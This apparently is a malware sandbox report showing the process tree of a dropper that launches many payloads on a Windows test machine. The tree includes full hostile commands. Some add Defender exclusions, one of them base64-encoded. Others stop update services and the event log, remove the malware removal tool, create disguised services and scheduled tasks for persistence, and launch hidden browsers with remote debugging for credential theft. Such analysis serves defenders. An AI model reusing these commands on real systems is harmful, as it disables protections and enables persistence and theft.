C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM chrome.exe5⤵
- Kills process with taskkill
PID:6088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
- Enumerates system info in registry
PID:2888 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffd2eebcc40,0x7ffd2eebcc4c,0x7ffd2eebcc586⤵PID:1516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1840,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1836 /prefetch:26⤵PID:5716
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1896,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:36⤵PID:3384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1992,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:86⤵PID:5356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2832,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2852 /prefetch:16⤵
- Uses browser remote debugging
PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2864,i,1245473809664630309,2713031136732994960,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2900 /prefetch:16⤵
- Uses browser remote debugging
PID:6152
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill /F /IM msedge.exe5⤵
- Kills process with taskkill
PID:6832
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:/Program Files (x86)/Microsoft/Edge/Application/msedge.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox5⤵
- Uses browser remote debugging
- Enumerates system info in registry
PID:3936 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd2dd146f8,0x7ffd2dd14708,0x7ffd2dd147186⤵PID:5964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --no-sandbox --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2088 /prefetch:26⤵
- Modifies registry class
PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2168 /prefetch:36⤵PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --mojo-platform-channel-handle=2524 /prefetch:86⤵PID:7356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:16⤵
- Uses browser remote debugging
PID:7628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:16⤵
- Uses browser remote debugging
PID:7636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:16⤵
- Uses browser remote debugging
PID:7060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-sandbox --remote-debugging-port=9222 --field-trial-handle=1996,7288476790203707157,17194902464174978361,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:16⤵
- Uses browser remote debugging
PID:6900
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"3⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- System policy modification
PID:5156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6504
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe"C:\Users\Admin\AppData\Local\Temp\Files\8fc809.exe"3⤵
- Checks computer location settings
- Drops file in Windows directory
PID:2384 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 5604⤵
- Program crash
PID:5252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 8004⤵
- Program crash
PID:7564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 8684⤵
- Program crash
PID:7604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 9004⤵
- Program crash
PID:7948
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 9284⤵
- Program crash
PID:7160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 7524⤵
- Program crash
PID:8132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 11204⤵
- Program crash
PID:6824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 11284⤵
- Program crash
PID:7128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 11964⤵
- Program crash
PID:8120
-
-
C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"C:\Users\Admin\AppData\Local\Temp\b739b37d80\Dctooux.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 5605⤵
- Program crash
PID:6868
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 5845⤵
- Program crash
PID:5280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 6885⤵
- Program crash
PID:6632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 7645⤵
- Program crash
PID:6568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 7725⤵
- Program crash
PID:4204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 8365⤵
- Program crash
PID:6544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 8525⤵
- Program crash
PID:6980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 8845⤵
- Program crash
PID:4832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 8965⤵
- Program crash
PID:6296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 9405⤵
- Program crash
PID:6220
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 9565⤵
- Program crash
PID:3384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 11645⤵
- Program crash
PID:6500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 10485⤵
- Program crash
PID:7592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 14565⤵
- Program crash
PID:7364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 13885⤵
- Program crash
PID:5708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 14645⤵
- Program crash
PID:5336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 11325⤵
- Program crash
PID:7556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 14805⤵
- Program crash
PID:9184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 11365⤵
- Program crash
PID:1272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 12165⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 5085⤵
- Program crash
PID:1408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 13365⤵
- Program crash
PID:8208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 10325⤵
- Program crash
PID:8892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 14325⤵
- Program crash
PID:5708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 13405⤵
- Program crash
PID:9396
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2384 -s 12204⤵
- Program crash
PID:6980
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"3⤵
- Suspicious use of SetThreadContext
PID:1764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7496
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'4⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe"C:\Users\Admin\AppData\Local\Temp\Files\inlandsPom.exe"3⤵PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:6732 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBwAGQAeABkAHkAZQB1AGwALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFkAagBsAHcAdQB1AHkAcwAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABZAGoAbAB3AHUAdQB5AHMALgBlAHgAZQA=4⤵PID:7072
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"C:\Users\Admin\AppData\Local\Temp\Files\Opdxdyeul.exe"4⤵
- Drops file in Windows directory
PID:6964
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"C:\Users\Admin\AppData\Local\Temp\Files\newbundle2.exe"3⤵
- Modifies system certificate store
PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"C:\Users\Admin\AppData\Local\Temp\Files\zq6a1iqg.exe"3⤵
- Suspicious use of SetThreadContext
PID:6392 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
PID:6164
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"3⤵
- Checks computer location settings
- Drops startup file
PID:7344
-
-
C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"C:\Users\Admin\AppData\Local\Temp\Files\chrome_93.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6700 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:8680
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:9212
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6288
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:9204
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:6644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:7844
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:7184
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:2204
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:1436
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:7312
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:6820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:3992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:4276
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:7176
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\server.exe"C:\Users\Admin\AppData\Local\Temp\Files\server.exe"3⤵PID:6680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\injector.exe"C:\Users\Admin\AppData\Local\Temp\Files\injector.exe"3⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6004 -
\??\c:\users\admin\appdata\local\temp\files\injector.exeÂc:\users\admin\appdata\local\temp\files\injector.exeÂ4⤵PID:8168
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:7836
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls5⤵PID:8864
-
-
-
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe4⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6064 -
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5852 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE6⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:8424 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe7⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6776 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR8⤵
- Suspicious use of SetWindowsHookEx
PID:5944
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"C:\Users\Admin\AppData\Local\Temp\Files\d8rb24m3.exe"3⤵PID:6784
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"C:\Users\Admin\AppData\Local\Temp\Files\Bluescreen.exe"3⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe"C:\Users\Admin\AppData\Local\Temp\Files\IadFRw%E2%80%AEfdp..exe"3⤵PID:8764
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\BtnoWSiF.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:9968
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BtnoWSiF" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF27.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:9140
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵PID:6356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵PID:5056
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 36⤵PID:9388
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"3⤵PID:8844
-
-
C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"C:\Users\Admin\AppData\Local\Temp\Files\shell.exe"3⤵PID:6984
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"3⤵PID:9616
-
C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp"C:\Users\Admin\AppData\Local\Temp\is-NUNUV.tmp\ubi-inst.tmp" /SL5="$60412,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"4⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-IADQN.tmp\set.bat""5⤵PID:6348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"C:\Users\Admin\AppData\Local\Temp\Files\prem1.exe"3⤵PID:6264
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:5512
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6264 -s 3084⤵
- Program crash
PID:8660
-
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1324
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1456
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2104
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1044
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3956
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
PID:2124 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3128
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:644
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:4432
-
-
